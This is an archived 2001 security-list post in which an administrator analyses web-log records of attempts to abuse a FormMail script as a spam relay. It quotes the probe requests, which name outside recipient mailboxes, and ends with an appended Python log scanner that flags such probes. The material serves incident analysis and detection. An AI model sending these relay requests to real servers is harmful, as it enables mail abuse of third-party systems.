Security Incidents: formmail

formmail

From: Soeren Ziehe <robinton_at_GMX.de>
Date: 01 Sep 2001 22:50:00 +0100

Hello incidents,

While looking at our weblogs, something caught my eye this week.

There was an attempt to use a formmail perl script installed on our
server from a non-local address.

A quick grep through our weblogs for this month and back to the beginning
of this year revealed a ton of requests for the 20th this month and a
few requests on the 11th, 23rd, 27th and 29th.

OK. Here's the beef:

I "censored" the last digits of the culprit's IP address or the first
part of the culprit's DNS name. Also [server] stands for the hostname of
my server.

It all began on the 11th.

xxx.dialup.mindspring.com - - [11/Aug/2001:15:05:13 +0200] "GET /cgi-bin/formmail.pl?recipient=johnday32_at_aol.com&subject=:-)&email=sexychickgrrrl@@aol.com&=http://[server]/cgi-bin/formmail.pl HTTP/1.1" 301 404 "-" "Microsoft URL Control - 6.00.8169"
xxx.dialup.mindspring.com - - [11/Aug/2001:15:05:14 +0200] "GET /cgi-bin/FormMail.pl?recipient=johnday32_at_aol.com&subject=:-)&email=sexychickgrrrl@@aol.com&=http://[server]/cgi-bin/formmail.pl HTTP/1.1" 200 352 "-" "Microsoft URL Control - 6.00.8169"

The first request met a 301 redirect and then accessed the formmail
script via its correct name (200 code).
However mail logs show no outgoing mail resulting from this. This was to
be expected as the script has been modified to prevent this kind of
abuse.
Does anyone know what "Microsoft URL Control" is? I guess a VB6 OCX, am
I right?

OK. After this initial probe there was a ton of hits on the 20th.

195.223.69.xxx - - [20/Aug/2001:08:08:07 +0200] "GET /cgi-bin/formmail.pl?email=chemie_at_chemie.com&recipient=extractorguy_at_aol.com&subject=[server]/cgi-bin/formmail.pl&=[server] HTTP/1.0" 301 404 "-" "SSM Agent 1.0"

  [505(!) similar loglines omitted]
.. [20/Aug/2001:08:14:00 +0200] ...
.. [20/Aug/2001:21:08:26 +0200] ...
  [214(!) similar loglines omitted]

195.223.69.xxx - - [20/Aug/2001:21:16:21 +0200] "GET /cgi-bin/formmail.pl?email=chemie_at_chemie.com&recipient=extractorguy_at_aol.com&subject=[server]/cgi-bin/formmail.pl&=[server] HTTP/1.0" 301 404 "-" "SSM Agent 1.0"

Different AOL mailbox as recipient and different tool signature.
Each of the requests was met with a 301 (redirect permanent) status code
since the scriptname is not correct (one off, mod_speling).

I have to guess that the program/script was on "auto" mode and maybe did
not know how to cope with a 301 redirect and kept retrying (until a
threshold value was hit or until user intervention).
There were two waves approx. 08:08 (507 hits) and 21:08 (216 hits) on
the 20th.

Things started again on the 23rd.

xxx.tnt4.daytona-beach.fl.da.uu.net - - [23/Aug/2001:03:35:04 +0200] "GET /cgi-bin/formmail.pl?recipient=johnday32_at_aol.com&subject=monkr&email=jh_at_aol.com&=http://[server]/cgi-bin/formmail.pl HTTP/1.1" 301 393 "-" "Microsoft URL Control - 6.00.8169"
xxx.tnt4.daytona-beach.fl.da.uu.net - - [23/Aug/2001:03:35:16 +0200] "GET /cgi-bin/FormMail.pl?recipient=johnday32_at_aol.com&subject=monkr&email=jh_at_aol.com&=http://[server]/cgi-bin/formmail.pl HTTP/1.1" 200 352 "-" "Microsoft URL Control - 6.00.8169"

Again another provider, but same recipient mail box and tool signature
as on the 11th.

On the 23rd we've got the same recipient and provider as on the 20th,
but different "tool" signature.

195.223.69.xx - - [23/Aug/2001:05:01:51 +0200] "GET /cgi-bin/formmail.pl?email=extractorguy_at_aol.com&recipient=Extractorguy_at_aol.com&subject=web%20browser%20test%20email&message=[server]/cgi-bin/formmail.pl HTTP/1.0" 301 417 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
195.223.69.xxx - - [23/Aug/2001:05:01:52 +0200] "GET /cgi-bin/FormMail.pl?email=extractorguy_at_aol.com&recipient=Extractorguy_at_aol.com&subject=web%20browser%20test%20email&message=[server]/cgi-bin/formmail.pl HTTP/1.0" 200 343 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
195.223.69.xxx - - [23/Aug/2001:05:57:45 +0200] "GET /cgi-bin/formmail.pl?email=extractorguy_at_aol.com&recipient=Extractorguy_at_aol.com&subject=web%20browser%20test%20email&message=[server]/cgi-bin/formmail.pl HTTP/1.0" 301 417 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"

First 301 redirect, then correct request. Then again redirect with no
follow up (why?).

The 27th brings us again the "URL Control" but with a slightly different
version number.
NO recipient given, but several variants of location and script name
tried.

xxx.hot.rr.com - - [27/Aug/2001:06:03:12 +0200] "GET /cgi-bin/formmail.cgi?recipient=&subject=&email=&=http://[server]/cgi-bin/formmail.cgi HTTP/1.1" 300 892 "-" "Microsoft URL Control - 6.00.8862"
xxx.hot.rr.com - - [27/Aug/2001:06:03:12 +0200] "GET /cgi-bin/formmail.pl?recipient=&subject=&email=&=http://[server]/cgi-bin/formmail.pl HTTP/1.1" 301 361 "-" "Microsoft URL Control - 6.00.8862"
xxx.hot.rr.com - - [27/Aug/2001:06:03:12 +0200] "GET /cgi-local/formmail.cgi?recipient=&subject=&email=&=http://[server]/cgi-local/formmail.cgi HTTP/1.1" 404 414 "-" "Microsoft URL Control - 6.00.8862"
xxx.hot.rr.com - - [27/Aug/2001:06:03:12 +0200] "GET /cgi-bin/FormMail.pl?recipient=&subject=&email=&=http://[server]/cgi-bin/formmail.pl HTTP/1.1" 200 891 "-" "Microsoft URL Control - 6.00.8862"
xxx.hot.rr.com - - [27/Aug/2001:06:03:12 +0200] "GET /cgi-local/formmail.pl?recipient=&subject=&email=&=http://[server]/cgi-local/formmail.pl HTTP/1.1" 404 412 "-" "Microsoft URL Control - 6.00.8862"

On the 29th, a different provider, but the same tool signature as the 27th.
Basically the same location/scriptname variants tried, however this time
the same AOL mailbox as for the 20th was given.

xxx.dialsprint.net - - [29/Aug/2001:05:56:49 +0200] "GET /cgi-bin/formmail.pl?recipient=extractorguy_at_aol.com&subject=WWW%20Form%20Submission&email=cgierrr_at_aol.com&=http://[server]/cgi-bin/formmail.pl HTTP/1.1" 301 419 "-" "Microsoft URL Control - 6.00.8862"
xxx.dialsprint.net - - [29/Aug/2001:05:56:50 +0200] "GET /cgi-bin/formmail.cgi?recipient=extractorguy_at_aol.com&subject=WWW%20Form%20Submission&email=cgierrr_at_aol.com&=http://[server]/cgi-bin/formmail.cgi HTTP/1.1" 300 1132 "-" "Microsoft URL Control - 6.00.8862"
xxx.dialsprint.net - - [29/Aug/2001:05:56:52 +0200] "GET /cgi-local/formmail.cgi?recipient=extractorguy_at_aol.com&subject=WWW%20Form%20Submission&email=cgierrr_at_aol.com&=http://[server]/cgi-local/formmail.cgi HTTP/1.1" 404 472 "-" "Microsoft URL Control - 6.00.8862"
xxx.dialsprint.net - - [29/Aug/2001:05:56:52 +0200] "GET /cgi-local/formmail.pl?recipient=extractorguy_at_aol.com&subject=WWW%20Form%20Submission&email=cgierrr_at_aol.com&=http://[server]/cgi-local/formmail.pl HTTP/1.1" 404 470 "-" "Microsoft URL Control - 6.00.8862"
xxx.dialsprint.net - - [29/Aug/2001:05:56:54 +0200] "GET /cgi-bin/FormMail.pl?recipient=extractorguy_at_aol.com&subject=WWW%20Form%20Submission&email=cgierrr_at_aol.com&=http://[server]/cgi-bin/formmail.pl HTTP/1.1" 200 355 "-" "Microsoft URL Control - 6.00.8862"

If you've stayed with me until here: has anyone seen the same access
attempt patterns/tool signatures?

Robinton

-- 
I've asked for kindness and ultimate truth. Still waiting for the answer.
-- 
Where right becomes wrong, resistance becomes a question of right.
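A log-review pass for the pattern described in the post, added here as an example and not part of the original message: it parses Apache combined-format lines (the layout quoted above) and flags FormMail requests whose recipient lies outside the server's own domains, that carry the bare "&=URL" parameter seen in every probe, that come from the quoted tool signatures, or that reached the script (200). LOCAL_DOMAINS and the sample log lines are assumptions constructed for the example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" log format, the layout of the lines quoted in the post.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
LOCAL_DOMAINS = {"example.com"}  # assumption: domains this server may legitimately mail to
SCANNER_UAS = ("Microsoft URL Control", "SSM Agent")  # tool signatures quoted in the post

# Constructed sample lines modelled on the post; hosts and mailboxes are placeholders.
SAMPLE_LOG = """\
xxx.dialup.example.net - - [11/Aug/2001:15:05:13 +0200] "GET /cgi-bin/formmail.pl?recipient=drop@example.org&subject=:-)&email=x@example.org&=http://www.example.com/cgi-bin/formmail.pl HTTP/1.1" 301 404 "-" "Microsoft URL Control - 6.00.8169"
xxx.dialup.example.net - - [11/Aug/2001:15:05:14 +0200] "GET /cgi-bin/FormMail.pl?recipient=drop@example.org&subject=:-)&email=x@example.org&=http://www.example.com/cgi-bin/formmail.pl HTTP/1.1" 200 352 "-" "Microsoft URL Control - 6.00.8169"
10.0.0.5 - - [20/Aug/2001:08:08:07 +0200] "GET /contact.html HTTP/1.0" 200 1200 "-" "Mozilla/4.0"
xxx.hot.example.net - - [27/Aug/2001:06:03:12 +0200] "GET /cgi-local/formmail.cgi?recipient=&subject=&email=&=http://www.example.com/cgi-local/formmail.cgi HTTP/1.1" 404 414 "-" "Microsoft URL Control - 6.00.8862"
"""

def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(entry):
    """Return the reasons a parsed request looks like a FormMail relay probe."""
    reasons = []
    parts = urlsplit(entry["url"])
    if not re.search(r"/formmail\.(pl|cgi)$", parts.path, re.I):
        return reasons  # not a FormMail script name, nothing to flag
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    recipient = params.get("recipient", "")
    if recipient and recipient.rsplit("@", 1)[-1].lower() not in LOCAL_DOMAINS:
        reasons.append("recipient outside local domains")
    if "" in params:  # the bare '&=http://...' parameter present in every probe in the post
        reasons.append("empty parameter name carrying the script URL")
    if entry["ua"].startswith(SCANNER_UAS):
        reasons.append("scanner user-agent")
    if entry["status"] == "200":
        reasons.append("script executed (200), check mail logs")
    return reasons

def scan(log_text):
    """Return (host, timestamp, reasons) for every request that classify() flags."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and (reasons := classify(entry)):
            hits.append((entry["host"], entry["ts"], reasons))
    return hits
```

Run `scan()` over a real access log and correlate any "200" hit with the mail log for the same minute, as the post does, to tell a blocked probe from a successful relay.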
Received on Sep 02 2001